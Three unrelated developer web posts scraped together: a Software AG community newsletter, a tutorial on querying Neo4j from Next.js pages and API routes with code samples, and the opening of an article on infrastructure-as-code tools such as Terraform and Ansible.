- [Hecktoberfest](https://tech.forums.softwareag.com/c/feedback/hecktoberfest/140) - For the month of October we are giving you the opportunity to post things that made your head tilt sideways wondering: “What the Heck?” Why is this like that? Read more [below](https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275#hecktoberfest-7)
## iPaaS Puzzle
In September, we launched the iPaaS Puzzles. The idea is simple - we challenge ourselves with a puzzle that is fun to solve, brings value, and at the same time is a great way to improve our integration skills. We are currently at the [3rd iPaaS Puzzle: Who’s Country is improving the most on the UN Sustainable Development Goals?](https://tech.forums.softwareag.com/t/3rd-ipaas-puzzle-who-s-country-is-improving-the-most-on-the-un-sustainable-development-goals/263977)
See also the previous riddles and how members like [@anela.osmanovic](https://tech.forums.softwareag.com/u/anela.osmanovic) solved them.
- [1st iPaaS Puzzle: Local Drought Water Calculator](https://tech.forums.softwareag.com/t/1st-ipaas-puzzle-local-drought-water-calculator/260665)
- [2nd iPaaS Puzzle: Prevent “Epic Fails” in Customer Service - Forum - Software AG Tech Community & Forums](https://tech.forums.softwareag.com/t/2nd-ipaas-puzzle-prevent-epic-fails-in-customer-service/263483)
- [3rd iPaaS Puzzle: Who’s Country is improving the most on the UN Sustainable Development Goals?](https://tech.forums.softwareag.com/t/3rd-ipaas-puzzle-who-s-country-is-improving-the-most-on-the-un-sustainable-development-goals/263977)
## webMethods Community Get-Together
We experimented with a new, more engaging, webinar format last month. 30 minutes update and the rest of the time quickly answering all of your questions. Check out the recordings of both webinars and let us know in the comments how you like them. We are planning on doing more of these in the near future.
- [Recording: webMethods Community Get-Together APJ/EMEA September 2022](https://tech.forums.softwareag.com/t/recording-webmethods-community-get-together-apj-emea-september-2022/262630)
- [Recording: webMethods Community Get-Together EMEA/Americas September 2022](https://tech.forums.softwareag.com/t/recording-webmethods-community-get-together-emea-americas-september-2022/262665)
## [Cumulocity IoT Aug 2022 update](https://tech.forums.softwareag.com/t/cumulocity-iot-aug-2022-update/260298)
The [latest release of Cumulocity IoT, version 10.13](https://cumulocity.com/releasenotes/release-10-13-0/overview-10-13-0/), is now available, and we’ve focused on enabling our customers to remain competitive, innovative, and to drive revenue – be smarter and faster in a world that constantly demands faster and better results.
- Learn more: [Cumulocity IoT Aug 2022 update](https://tech.forums.softwareag.com/t/cumulocity-iot-aug-2022-update/260298)
## IoT Survey
Please fill in our [\*\*\* Cumulocity IoT Developer Survey 2022 \*\*\*](https://forms.office.com/r/w1rRzxUp0S)
Let us know what is important to you and what we should do to bring the **best developer experience** for you.
The whole survey will only take **~5 min of your time**.
- Learn more: [IoT Developer Survey](https://tech.forums.softwareag.com/t/iot-developer-survey-2022/262679)
## Hecktoberfest
We invite you to take part in our WTH October (Hecktoberfest)!
It is the right place to share with everyone your very own “what/why the heck? !” moments you experience when using our software or services. We would like to collect these, hopefully solve/clarify some of them or put them into our development pipeline.
- Learn more: [Hecktoberfest - One Month, Your Voice, Your Thoughts!](https://tech.forums.softwareag.com/t/hecktoberfest-one-month-your-voice-your-thoughts/264229)
- Direct Link to the [Hecktoberfest Category](https://tech.forums.softwareag.com/c/feedback/hecktoberfest/140) on Tech Community, where the first [‘WTH …?’ question](https://tech.forums.softwareag.com/t/wth-webmethods-integration-server-why-cant-i-keep-losing-acls-every-time-i-export-the-packages/264255/4) has been posted and answered already.
## Most valuable contributor award
In August we presented our long-time Community Guru **Rob Eamon [@reamon](https://tech.forums.softwareag.com/u/reamon)** with our _Most Valuable Contributor award_. Rob has been a member of our forums for more than a decade and his posts have helped thousands of users. His comments are always insightful and bring value to any conversation. With the knowledge he's sharing and his honest feedback, Rob has been really inspirational for our team and the whole community!
[](https://tech.forums.softwareag.com/u/reamon/summary)
## Top Members of the quarter
[
Cheers to our Top Community members and Most Valuable Contributors](https://tech.forums.softwareag.com/t/top-members-q3-2022/264198)
#### — **You rock!**
## TECHniques Issue 3
<a href="https://tech.forums.softwareag.com/t/techniques-issue-3-2022/264404">TECHniques newsletter - Issue 3, 2022</a>
## New API content
- [Reverse monetization](https://tech.forums.softwareag.com/t/reverse-monetization/260351)
- [Deflector and shield](https://tech.forums.softwareag.com/t/deflector-and-shield/260513)
- [Automating API Testing with webMethods API Management and Postmans](https://tech.forums.softwareag.com/t/automating-api-testing-with-webmethods-api-management-and-postman/260727)
- [Integrating Azure AD with webMethods Developer Portal](https://tech.forums.softwareag.com/t/integrating-azure-ad-with-webmethods-developer-portal/263551)
- [Developer Portal User Onboarding](https://tech.forums.softwareag.com/t/developer-portal-user-onboarding/263573)
- [API Security with webMethods API Management and Noname Security](https://tech.forums.softwareag.com/t/api-security-with-webmethods-api-management-and-noname-security/263598)
- [webMethods Developer Portal trying out an OAuth2 Protected API](https://tech.forums.softwareag.com/t/webmethods-developer-portal-trying-out-an-oauth2-protected-api/263703)
- [webMethods Developer Portal trying out an JWT Protected API](https://tech.forums.softwareag.com/t/webmethods-developer-portal-trying-out-an-jwt-protected-api/263708)
- [webMethods Developer Portal CSP (Content Security Policy) Troubleshooting](https://tech.forums.softwareag.com/t/webmethods-developer-portal-csp-content-security-policy-troubleshooting/263736)
## Top Knowledge base and blog articles
- [How to get started with Cloud Remote Access for Cumulocity IoT](https://tech.forums.softwareag.com/t/how-to-get-started-with-cloud-remote-access-for-cumulocity-iot/258446/2)
- [webMethods.io Integration - First steps, tutorials & how-tos](https://tech.forums.softwareag.com/t/webmethods-io-integration-first-steps-tutorials-how-tos/255635/2)
- [The New Learning Portal is live](https://tech.forums.softwareag.com/t/the-new-learning-portal-is-live/259267/2)
- [webMethods.io Integration workflow: Automatically send PMs to multiple users in Discourse platform](https://tech.forums.softwareag.com/t/webmethods-io-integration-workflow-automatically-send-pms-to-multiple-users-in-discourse-platform/258972/4)
- [webMethods.io B2B processing message using RNIF 2.0](https://tech.forums.softwareag.com/t/webmethods-io-b2b-processing-message-using-rnif-2-0/259584/2)
- [How many gateways?](https://tech.forums.softwareag.com/t/how-many-gateways/259911)
- [Post Message in Slack Channel for operation in Developer Portal](https://tech.forums.softwareag.com/t/post-message-in-slack-channel-for-operation-in-developer-portal/260586)
- [Welcome Email to a new Contact on Microsoft Dynamics](https://tech.forums.softwareag.com/t/welcome-email-to-a-new-contact-on-microsoft-dynamics/259596)
- [Troubleshooting OAuth 2.0 compliant Email Listener](https://tech.forums.softwareag.com/t/troubleshooting-oauth-2-0-compliant-email-listener/263692/1)
- [Compressing Integration Server’s Apache Derby Embedded Database](https://tech.forums.softwareag.com/t/compressing-integration-servers-apache-derby-embedded-database/263620/1)
## Top forum discussions
- [1st iPaaS Puzzle: Local Drought Water Calculator](https://tech.forums.softwareag.com/t/1st-ipaas-puzzle-local-drought-water-calculator/260665)
- [CD is failed to installed](https://tech.forums.softwareag.com/t/cd-is-failed-to-installed/260617)
- [How to read/iterate the data in Array (1:V)](https://tech.forums.softwareag.com/t/how-to-read-iterate-the-data-in-array-1-v/263472)
- [Reading Event MO by means of SmartREST](https://tech.forums.softwareag.com/t/reading-event-mo-by-means-of-smartrest/258878)
- [Switching between COAP and HTTP via REST API?](https://tech.forums.softwareag.com/t/switching-between-coap-and-http-via-rest-api/259138)
- [Getting Error while connecting to AWS SQS](https://tech.forums.softwareag.com/t/getting-error-while-connecting-to-aws-sqs/258849)
- [How to fetch all the JDBC connection details in IS page](https://tech.forums.softwareag.com/t/how-to-fetch-all-the-jdbc-connection-details-in-is-page/259957)
- [Unable to publish messages through thin-io.edge to child devices that are created with the cumulocity IoT Open API](https://tech.forums.softwareag.com/t/unable-to-publish-messages-through-thin-io-edge-to-child-devices-that-are-created-with-the-cumulocity-iot-open-api/263510)
- [The Things Network web hook receiving message “cannot access endpoint: /service/ttn-integration”](https://tech.forums.softwareag.com/t/the-things-network-web-hook-receiving-message-cannot-access-endpoint-service-ttn-integration/260702)
- [IS not joining the cluster during initial configuration](https://tech.forums.softwareag.com/t/is-not-joining-the-cluster-during-initial-configuration/258805)
* * *
> This article is part of the TECHniques newsletter blog - technical tips and tricks for the Software AG community. [Subscribe](https://info.softwareag.com/TechCommunity-Subscription-Page.html) to receive our quarterly updates or read the [latest issue](https://tech.forums.softwareag.com/techniques-latest).
[Read full topic](https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1) | techcomm_sag |
1,232,500 | Using Neo4j in your next Next.js Project | After watching a few glossy new videos from the Next.js Conf 2022, I thought I'd take a closer look... | 0 | 2022-10-27T16:38:36 | https://dev.to/adamcowley/using-neo4j-in-your-next-nextjs-project-77 | javascript, webdev, nextjs, neo4j | After watching a few glossy new videos from the [Next.js Conf 2022](https://nextjs.org/conf), I thought I'd take a closer look at Next.js and see how the framework could help me to build my next Neo4j-based web application.
Fundamentally, adding Neo4j integration to a Next.js project is similar to any other Node.js/TypeScript-based project. However, the various Data Fetching methods and both Server-side and Client-side rendering raise some interesting challenges.
Let's take a look at how we can use Neo4j in a Next.js project.
## What is Next.js?
Next.js is a React-based framework which provides an opinionated starting point for building web applications. The framework provides building blocks for many of the common features that developers need to consider when building modern applications such as UI components, Data Fetching, and Rendering.
The framework also focuses on performance, providing the ability to pre-generate static HTML pages using _Static-site Generation (SSG)_, render HTML on the server at request time using _Server-side rendering (SSR)_ and also render React components on the client-side using _Client-side Rendering (CSR)_.
You can [read more about Next.js here](https://nextjs.org/learn/foundations/about-nextjs/what-is-nextjs).
## What is Neo4j?
The chances are, if you have found this article via search, you know more about Next.js than Neo4j. Neo4j is a _Graph Database_: a database consisting of _Nodes_, which represent entities or _things_, connected together by _Relationships_.
Neo4j comes into its own when working with highly connected datasets or as an alternative for complex relational database schemas where many joins are required. The golden rule is that if your queries have three or more joins, you should really be looking at using a graph database.
You can [read more about Neo4j here](https://neo4j.com/developer/graph-database/).
## Why Neo4j and Next.js?
Next.js is gaining momentum as one of the most popular frameworks for building modern web applications. One benefit of using Next.js is that your front-end and back-end code live in the same project, with server-side route handlers self-contained in the `pages/api/` directory.
If you are building a Neo4j-backed project, building an integration with the [Neo4j JavaScript Driver](https://github.com/neo4j/neo4j-javascript-driver/) is relatively straightforward. All you need to do is create a new instance of the driver within the application, then use the driver to execute Cypher statements and retrieve results.
Of course, you can use the Neo4j JavaScript driver directly from React components, but this means exposing database credentials to the client, which is a security risk. Instead, if you need on-demand data from Neo4j during client-side rendering, you can create an API handler that executes the Cypher statement server-side and returns the results.
## Creating a free Neo4j AuraDB Instance
[Neo4j AuraDB](https://neo4j.com/cloud/platform/aura-graph-database/), Neo4j's fully managed cloud service, provides one **AuraDB Free** instance to all users, completely free, with no credit card required.
If you sign in or register for Neo4j Aura at [cloud.neo4j.io](https://cloud.neo4j.io), you will see a **New Instance** button at the top of the screen. If you click this button, you will be able to choose between an empty database or one pre-populated with sample data.

For this article, I suggest choosing the `Graph-based Recommendations` dataset, which consists of Movies, Actors, Directors and user ratings. This dataset is a nice introduction to graph concepts and can be used to build a movie recommendation algorithm. We use it across [GraphAcademy](https://graphacademy.neo4j.com/?ref=dev.to), including the [Building Neo4j Applications with Node.js](https://graphacademy.neo4j.com/courses/app-nodejs/?ref=dev.to) course.
Click **Create** to create your instance. Once you have done so, a modal window will appear with a generated password.

Click the **Download** button to download your credentials; we'll need these a little later on. After a couple of minutes, your instance will be ready to explore. You can click the **Explore** button to [explore the graph with Neo4j Bloom](https://neo4j.com/product/bloom/), or query the graph using Cypher by clicking the **Query tab**.

You can take a look at that in your own time, for now, let's focus on our Next.js application.
## Creating a new Next.js Project
You can create a new Next.js project from a template using the [Create Next App CLI command](https://nextjs.org/docs/api-reference/create-next-app).
```sh
npx create-next-app@latest
```
The command will prompt you for a project name and install any dependencies.
## Adding Neo4j Helper Functions
To use the Neo4j JavaScript Driver, first install the dependency:
```sh
npm install --save neo4j-driver
# or yarn add neo4j-driver
```
Next.js comes with [built-in support for Environment Variables](https://nextjs.org/docs/basic-features/environment-variables), so we can simply copy the credentials file downloaded from the Neo4j Aura Console above, rename it to `.env` and place in the directory root.
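For reference, a minimal `.env` might look like the following. The values below are placeholders, not real credentials; use the ones from your downloaded file:

```env
NEO4J_URI=neo4j+s://xxxxxxxx.databases.neo4j.io
NEO4J_USERNAME=neo4j
NEO4J_PASSWORD=your-generated-password
```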
We can then access those variables through the `process.env` variable:
```js
const { NEO4J_URI, NEO4J_USERNAME, NEO4J_PASSWORD } = process.env
```
Next, create a new folder called `lib/` and then create a new `neo4j.js` file. You will want to import the `neo4j` object from the `neo4j-driver` dependency and use the credentials above to create a driver instance:
```js
// lib/neo4j.js
import neo4j from 'neo4j-driver'

const driver = neo4j.driver(
process.env.NEO4J_URI,
neo4j.auth.basic(
process.env.NEO4J_USERNAME,
process.env.NEO4J_PASSWORD
)
)
```
When executing a Cypher statement against a Neo4j instance, you need to open a session, and execute the statement within a read or write transaction. This can become a bit cumbersome after a while, so instead, I recommend writing helper functions for read and write queries:
```js
// lib/neo4j.js
export async function read(cypher, params = {}) {
// 1. Open a session
const session = driver.session()
try {
// 2. Execute a Cypher Statement
const res = await session.executeRead(tx => tx.run(cypher, params))
// 3. Process the Results
const values = res.records.map(record => record.toObject())
return values
}
finally {
// 4. Close the session
await session.close()
}
}
export async function write(cypher, params = {}) {
// 1. Open a session
const session = driver.session()
try {
// 2. Execute a Cypher Statement
const res = await session.executeWrite(tx => tx.run(cypher, params))
// 3. Process the Results
const values = res.records.map(record => record.toObject())
return values
}
finally {
// 4. Close the session
await session.close()
}
}
```
If you want a deeper dive into this code or best practices I recommend that you check out the [Neo4j & Node.js Course](https://graphacademy.neo4j.com/courses/app-nodejs/?ref=dev.to) on GraphAcademy.
Now that we have a way to query Neo4j, let's look at the options for Data Fetching in Next.js
## Data Fetching in Next.js
Next.js allows the rendering of content in several ways.
1. Static-site Generation (SSG) - where static HTML pages are generated at _build_ time
2. Server-side Rendering (SSR) - HTML is generated server-side as a request comes in
3. Client-side Rendering (CSR) - HTTP requests are executed in the browser with JavaScript and the response updates the DOM
Depending on your use case, you may need a mixture of these methods. Say you are running a movie recommendation site: it may make sense to use SSG to pre-build marketing pages. Movie information is held in a database and changes regularly, so those pages should be rendered by the server using SSR. When a user comes to rate a movie, the interaction should take place via an API request and the result rendered using CSR.
Let's take a look at the implementation of each of these methods.
### Static Page Generation
Let's say, for example, that generic genre pages won't change often and they don't require any user interaction. By generating static pages, we can serve cached versions of the pages and take the load away from the server.
Any component in the `pages/` directory which exports a `getStaticProps()` function (known as a Page) will be generated at build time and served as a static file.
Components created in the pages folder will automatically be mapped to a route. To create a page that will be available at `/genres` you will need to create a `pages/genres/index.jsx` file. The component needs to export a `default` function which returns a JSX component, and a `getStaticProps()` function.
First, to get the data required by the component, create the `getStaticProps()` function and execute [this Cypher statement](https://github.com/neo4j-graphacademy/neoflix-cypher/blob/main/cypher/3-backlog/1-browse-genres/genre-details.cypher) in a _read_ transaction.
```js
// pages/genres/index.jsx
export async function getStaticProps() {
const res = await read(`
MATCH (g:Genre)
WHERE g.name <> '(no genres listed)'
CALL {
WITH g
MATCH (g)<-[:IN_GENRE]-(m:Movie)
WHERE m.imdbRating IS NOT NULL AND m.poster IS NOT NULL
RETURN m.poster AS poster
ORDER BY m.imdbRating DESC LIMIT 1
}
RETURN g {
.*,
movies: toString(size((g)<-[:IN_GENRE]-(:Movie))),
poster: poster
} AS genre
ORDER BY g.name ASC
`)
const genres = res.map(row => row.genre)
return {
props: {
genres,
}
}
}
```
Anything returned inside `props` from this function will be passed as a prop into the default component.
Now, export a default function which displays a list of Genres.
```jsx
// pages/genres/index.jsx
export default function GenresList({ genres }) {
return (
<div>
<h1>Genres</h1>
<ul>
{genres.map(genre => <li key={genre.name}>
<Link href={`/genres/${genre.name}`}>{genre.name} ({genre.movies})</Link>
</li>)}
</ul>
</div>
)
}
```
This should generate an unordered list of links for each Genre:

Looking good...
If you run the `npm run build` command, you will see a `genres.html` file inside the `.next/server/pages/` directory.
### Using Neo4j for Server-side Rendering
The movie list on each genre page may change often, or you may wish to add extra interaction to the page. In this case, it makes sense to render this page on the server. Pages rendered with `getServerSideProps()` are not cached by default, but you can set `Cache-Control` headers to cache responses for a short amount of time, which is ideal for websites with high amounts of traffic.
Each genre link on the previous page links to `/genres/[name]` - for example `/genres/Action`. By creating a `pages/genres/[name].jsx` file, Next.js knows automatically to listen for requests on any URL starting with `/genres/` and detect anything after the slash as a `name` URL parameter.
This parameter can be accessed inside the `getServerSideProps()` function; exporting this function instructs Next.js to render the page using Server-side Rendering as each request comes in.
The `getServerSideProps()` function should be used to get the data required to render the page and return it inside a `props` key.
```js
export async function getServerSideProps({ query, params }) {
const limit = 10
const page = parseInt(query.page ?? '1')
const skip = (page - 1) * limit
const res = await read(`
MATCH (g:Genre {name: $genre})
WITH g, size((g)<-[:IN_GENRE]-()) AS count
MATCH (m:Movie)-[:IN_GENRE]->(g)
RETURN
g { .* } AS genre,
toString(count) AS count,
m {
.tmdbId,
.title
} AS movie
ORDER BY m.title ASC
SKIP $skip
LIMIT $limit
`, {
genre: params.name,
limit: int(limit),
    skip: int(skip)
})
const genre = res[0].genre
const count = res[0].count
return {
props: {
genre,
count,
movies: res.map(record => record.movie),
page, skip, limit,
}
}
}
```
In the example above, I get the genre name from the `params` object in the request context, which is passed as the only argument to the `getServerSideProps()` function. I also read the `?page=` query parameter from the URL to provide a paginated list of movies.
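The pagination arithmetic above can be extracted into a small helper. This is a hypothetical refactor sketch, not code from the article; `getPagination` is an illustrative name:

```javascript
// Hypothetical helper (illustrative name, not from the article): turns the
// 1-based ?page= query parameter into SKIP/LIMIT values for the Cypher statement.
function getPagination(query, limit = 10) {
  // parseInt returns NaN for missing or garbage input; fall back to page 1
  const page = Math.max(1, parseInt(query.page ?? '1', 10) || 1)
  return { page, limit, skip: (page - 1) * limit }
}

console.log(getPagination({ page: '3' })) // { page: 3, limit: 10, skip: 20 }
console.log(getPagination({}))            // { page: 1, limit: 10, skip: 0 }
```

The resulting `skip` and `limit` values should still be wrapped with the driver's `int()` before being passed as Cypher parameters, as in the statement above.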
These values will again be passed as props into the _default_ function, and can therefore be used to list the movies and pagination links.
```jsx
export default function GenreDetails({ genre, count, movies, page, skip, limit }) {
return (
<div>
<h1>{genre.name}</h1>
<p>There are {count} movies listed as {genre.name}.</p>
<ul>
{movies.map(movie => <li key={movie.tmdbId}>{movie.title}</li>)}
</ul>
<p>
Showing page #{page}. <br />
{page > 1 ? <Link href={`/genres/${genre.name}?page=${page-1}`}> Previous</Link> : ' '}
{' '}
{skip + limit < count ? <Link href={`/genres/${genre.name}?page=${page+1}`}>Next</Link> : ' '}
</p>
</div>
)
}
```
Next.js then renders a list of movies with each request.

### Using Neo4j for Client-side Data Fetching
As it stands, for each click of the Previous and Next links above, the entire page will reload which isn't ideal. Although this is a trivial example so far, loading KBs worth of HTML again to render the header and footer means additional load on the server and more data sent over the wire.
Instead, you could build a React component that would load the list of movies asynchronously through a client-side HTTP request. This would mean that the list of movies could be updated without reloading the entire page, providing the end-user with a smoother viewing experience.
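One detail worth handling on the client is URL construction: genre names can contain spaces or other characters that are not URL-safe. A small sketch (the helper name is mine, not from the article) using `encodeURIComponent` and `URLSearchParams`:

```javascript
// Hypothetical helper: builds the client-side request URL for the API route,
// encoding the genre name so values containing spaces remain valid URLs.
function genreMoviesUrl(name, page = 1, limit = 10) {
  const params = new URLSearchParams({ page: String(page), limit: String(limit) })
  return `/api/genres/${encodeURIComponent(name)}/movies?${params}`
}

console.log(genreMoviesUrl('Science Fiction', 2))
// "/api/genres/Science%20Fiction/movies?page=2&limit=10"
```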
To support this, we will have to create a [API Route](https://nextjs.org/docs/api-routes/introduction) which will return a list of movies as JSON.
Any file in the `pages/api/` directory is treated as a route handler, a single default exported function which accepts request and response parameters, and expects an HTTP status and response to be returned.
So to create an API route to serve a list of movies at `http://localhost:3000/api/genres/[name]/movies`, create a new `movies.js` file in the `pages/api/genres/[name]` folder.
```js
// pages/api/genres/[name]/movies.js
export default async function handler(req, res) {
const { name } = req.query
const limit = 10
  const page = parseInt(req.query.page ?? '1')
const skip = (page - 1) * limit
  const result = await read(`
MATCH (m:Movie)-[:IN_GENRE]->(g:Genre {name: $genre})
RETURN
g { .* } AS genre,
toString(size((g)<-[:IN_GENRE]-())) AS count,
m {
.tmdbId,
.title
} AS movie
ORDER BY m.title ASC
SKIP $skip
LIMIT $limit
`, {
genre: name,
limit: int(limit),
skip: int(skip)
})
res.status(200).json({
total: parseInt(result[0]?.count) || 0,
data: result.map(record => record.movie)
})
}
```
The function above executes a Cypher statement in a read transaction, processes the results and returns the list of
movies as a JSON response.
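One subtlety worth calling out: the statement casts the count to a string (`toString(...)`) and the handler parses it back with `parseInt`. That is because the JavaScript driver returns Cypher integers as its own `Integer` type, which does not serialise to a plain number with `JSON.stringify`. A plain-JavaScript illustration (the object below is a stand-in for the driver's type, not the real class):

```javascript
// Stand-in for the driver's Integer type (illustrative only): the real class
// also stores the value as 32-bit { low, high } halves.
const fakeNeo4jInt = { low: 158, high: 0, toString: () => '158' }

// JSON.stringify emits the internal fields rather than the number...
console.log(JSON.stringify(fakeNeo4jInt)) // {"low":158,"high":0}

// ...so the Cypher statement casts to a string, and the handler parses it back.
const count = parseInt(fakeNeo4jInt.toString(), 10)
console.log(count) // 158
```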
A quick GET request to http://localhost:3000/api/genres/Action/movies returns the total count along with the list of movies:
```json
{
  "total": /* total number of Action movies */,
  "data": [
    {
      "tmdbId": "72867",
      "title": "'Hellboy': The Seeds of Creation"
    },
    {
      "tmdbId": "58857",
      "title": "13 Assassins (Jûsan-nin no shikaku)"
    }
    /* ... */
  ]
}
```
This API handler can then be called from a React component inside a `useEffect` hook.
```jsx
// components/genre/movie-list.tsx
export default function GenreMovieList({ genre }: GenreMovieListProps) {
const [page, setPage] = useState<number>(1)
const [limit, setLimit] = useState<number>(10)
const [movies, setMovies] = useState<Movie[]>()
const [total, setTotal] = useState<number>()
// Get data from the API
useEffect(() => {
fetch(`/api/genres/${genre.name}/movies?page=${page}&limit=${limit}`)
.then(res => res.json())
.then(json => {
setMovies(json.data)
setTotal(json.total)
})
}, [genre, page, limit])
// Loading State
if (!movies || !total) {
return <div>Loading...</div>
}
return (
<div>
<ul>
{movies.map(movie => <li key={movie.tmdbId}>{movie.title}</li>)}
</ul>
<p>Showing page {page}</p>
{page > 1 && <button onClick={() => setPage(page - 1)}>Previous</button>}
{page * limit < total && <button onClick={() => setPage(page + 1)}>Next</button>}
</div>
)
}
```
The component is then in charge of pagination, and updates to the list don't re-render the entire page.
## Conclusion
This is far from a comprehensive guide to Next.js or Neo4j integrations, but hopefully it serves as a quick reference for anyone wondering about the best way to integrate Neo4j, or any other database for that matter, with a Next.js application.
All of the code from this experiment is [available on Github](https://github.com/adam-cowley/neo4j-nextjs-example).
If you are interested in learning more about Next.js, they have put together a [course for developers to learn the basics](https://nextjs.org/learn/basics/create-nextjs-app).
If you would like to learn more about Neo4j, then I would recommend taking a look at the [Beginners Neo4j Courses on GraphAcademy](https://graphacademy.neo4j.com?ref=dev.to). If you want to know more about how to use the Neo4j JavaScript Driver in a Node.js or Typescript project, I would also recommend the [Building Neo4j Applications with Node.js course](https://github.com/neo4j-graphacademy/app-nodejs?ref=dev.to).
If you have any comments or questions, feel free to [reach out to me on Twitter](https://twitter.com/adamcowley). | adamcowley |
1,232,883 | 10 Best Infrastructure-as-Code Tools for Automating Deployments in 2022 | IT technologies continue to evolve at an unprecedented pace. From cloud computing to DevOps and... | 0 | 2022-10-27T20:16:11 | https://dev.to/vishnube/10-best-infrastructure-as-code-tools-for-automating-deployments-in-2022-51cp | deployments, webdev, programming, software | IT technologies continue to evolve at an unprecedented pace. From cloud computing to DevOps and artificial intelligence (AI) to internet of things (IoT), the technology landscape has unlocked potential opportunities for IT businesses to generate value.
The enterprise IT infrastructure has become crucial for modern-day digital business. It is because it facilitates the compute, network and data capabilities required to run business-critical software applications. The key role of infrastructure goes beyond production environs. It spreads across the complete development process. The infrastructure includes a host of components including servers, load balancers, firewalls, and databases. They also include [DevOps tools](https://dzone.com/articles/top-25-devops-tools-for-2021), [CI/CD platforms](https://dzone.com/articles/devops-cicd-tools-to-watch-out-for-in-2022), staging environments, and [testing](https://dzone.com/articles/how-to-enhance-your-deployment-with-continuous-tes) tools. But there’s a catch here.
With the rapidly changing technology landscape, the traditional approaches to infrastructure are hampering businesses to adapt, innovate, and thrive optimally. The manual process of managing infrastructure has become obsolete and fails to meet the demands of the DevOps-based high-speed software development cycles.
The need of the hour is an infrastructure focused on [continuous innovation](https://dzone.com/articles/a-cloud-platform-to-speed-up-your-devops), automation, and optimization. An infrastructure that can help organizations keep pace with rapid software development and accelerated technological change. And, at this juncture, Infrastructure as Code (IaC) tools have emerged as the key to navigating this challenge. Let’s delve deep into the details:
## What Are Infrastructure-as-Code (IaC) Tools?
Infrastructure-as-Code (IaC) is the process of codifying and managing underlying IT infrastructure as software. It enables DevOps teams to automatically manage, monitor, and provision resources, instead of manually configuring multifarious hardware devices and operating systems. IaC is also referred to as programmable or software-defined infrastructure.
With IaC tools at their disposal, [DevOps](https://dzone.com/articles/devops-toolchain-for-beginners) teams can easily edit and distribute configurations, while ensuring a stable state of the infrastructure. The IaC tools allow easy integration of infrastructure into the version control mechanisms and provide the ability to imbibe automation for infrastructure provisioning and management.
## What Are the Benefits of Using Infrastructure as Code Tools?
IaC tools have transformed the way IT infrastructure is provisioned and managed today. They paved the way for complete automation and configuration of infrastructure, with its elements such as physical servers, configuring networks, and databases being treated similarly to software. This empowered development teams to adopt a range of DevOps and [Agile](https://dzone.com/articles/continuous-delivery-vs) practices that automate and fast-track software development processes. The IaC tools helped teams to leverage best practices such as continuous integration (CI), continuous delivery (CD), and test-driven development (TDD). Moreover, IaC enabled businesses to make the most of deployment orchestration, automated testing libraries, and version control systems (VCS). Besides these salient features, the IaC tools offered a host of businesses benefits as follows:
**High Transparency and Accountability**
The IaC source code files are versioned and kept under configuration control. This gives teams full traceability, easy rollbacks, and branching.
**Improved Configuration Consistency**
Unplanned changes or updates lead to asymmetric development, testing, staging, and production environments. This, in turn, results in configuration drift. This is where IaC tools come in.
IaC helps avoid configuration drift by provisioning identical, reproducible environments every time. Moreover, these environments can be scaled on demand by reusing centralized modules and their stored configurations as many times as needed.
**Enhanced Speed and Efficiency**
With IaC tools, teams can set up infrastructure swiftly within a short turnaround time by simply running a uniform code stored in SCM, making it repeatable and scalable. This can be implemented at all stages of the application delivery lifecycle, from the development to the production stage. This results in more efficient and faster software development.
**Improved Cloud Utilization**
In a bid to gain the best of both clouds, businesses across the globe are leveraging multi-cloud and hybrid cloud environments. However, multi and hybrid clouds have multifarious software-defined APIs, giving rise to unwanted bottlenecks. And IaC tools are the best way to abstract the layers from the heterogeneity of the cloud.
**Cost Optimization**
As infrastructure as code tools eliminate the need for resources in terms of time, budget, and staff to manually provision, scale, and manage the infrastructure, businesses can save potential costs. Moreover, as IaC is platform-agnostic, businesses can leverage cloud computing solutions and benefit from its advantages such as flexibility and pay-as-you-go pricing. They can also save costs by deploying automation strategies that help technical teams to relieve error-prone, manual tasks and divert their valuable time towards developing innovative and mission-critical applications.
## What Are the Must-have Features of an Iac Tool?
The above benefits emphasize the need for IaC tools in the present-day DevOps world. But choosing the right set of IaC tools that rightly fit the business needs can be a herculean task. This is because there are numerous IaC tools available in the market, with a wide range of overlapping features and differences. Taking due cognizance of this challenge, we have curated the must-have features of an IaC tool to help you choose the best tool for your organization:
**Ease of Use**
One of the most prominent USPs of an IaC tool is its ease of use. The tool must make it simple to configure, deploy, and manage IaC across numerous infrastructure environments.
**Multi-cloud Compatibility**
Organizations across the world are now moving to multi-cloud to lower the risk of cloud downtime and business outage. Moreover, they gain the flexibility to use the best possible cloud for each workload, to improve performance. So, IaC tools must be multi-cloud compatible to enable businesses to manage infrastructure across multiple cloud environments. The IaC platform must be designed from the ground up to meet the demands of the modern cloud.
**Adoption by Industry Experts**
Before adopting infrastructure as a code tool, businesses must do some research on how the tool is adopted across the industry. This research helps in understanding the ins and outs of the tool. As there are innumerable IaC tools available in the market, look for tools that are adopted by experts in your industry to make your investment count. In this way, you avoid any chances of going astray.
**Scalability**
The IaC tool must enable unlimited scalability for managing IT resources. Traditionally, a team's scalability is limited by the team's size, skillset, and the time it can devote to the configuration and management of infrastructure. In order to gain an edge in the modern world, the IaC tool must remove this barrier by enabling teams to configure a large number of resources very quickly. This is especially important as many IT environs today must scale up and down quickly and efficiently.
**Reusability**
Reusability is one of the prominent must-have features of an IaC tool. The reusability of IaC empowers developers with the ability to script once and use that code multiple times, achieving great economies of scale, efficiency, and time savings.
Now, let’s have a glance at the best infrastructure as code tools that helps DevOps teams to optimally automate infrastructure deployment and management:
## The Top 10 IaC Tools To Automate Deployments in 2022
**Terraform**
[Terraform](https://dzone.com/articles/how-to-develop-terraform-custom-provider) is an open-source infrastructure-as-code tool that uses HashiCorp Configuration Language (HCL), which is one of the easiest IaC languages. The tool comes with a host of benefits, making it one of the most popular IaC tools. Terraform is multi-cloud compatible and is used for codifying the management of any cloud and on-premises resources. Simply put, you can provision, change, and version resources in any environment.
Terraform uses declarative config files to create new resources, manage the existing ones, and remove those that are unused. This open-source tool is easily readable and uses modules to organize your code and reuse your resources. Common use cases of Terraform include automated infrastructure provisioning, multi-cloud deployment, Kubernetes management, virtual machine image management, existing CI/CD workflow integration, and policy as code.
**Ansible**
After Terraform, [Ansible](https://dzone.com/articles/simplifying-terraform-deployments-with-ansible-par) is the most preferred IaC tool in the world. It is an imperative IaC tool, so it not only provisions infrastructure but also manages the configuration of the services. Ansible is a simple IT automation platform that helps automate cloud provisioning, configuration management, application deployment, and intra-service orchestration, among other IT requirements.
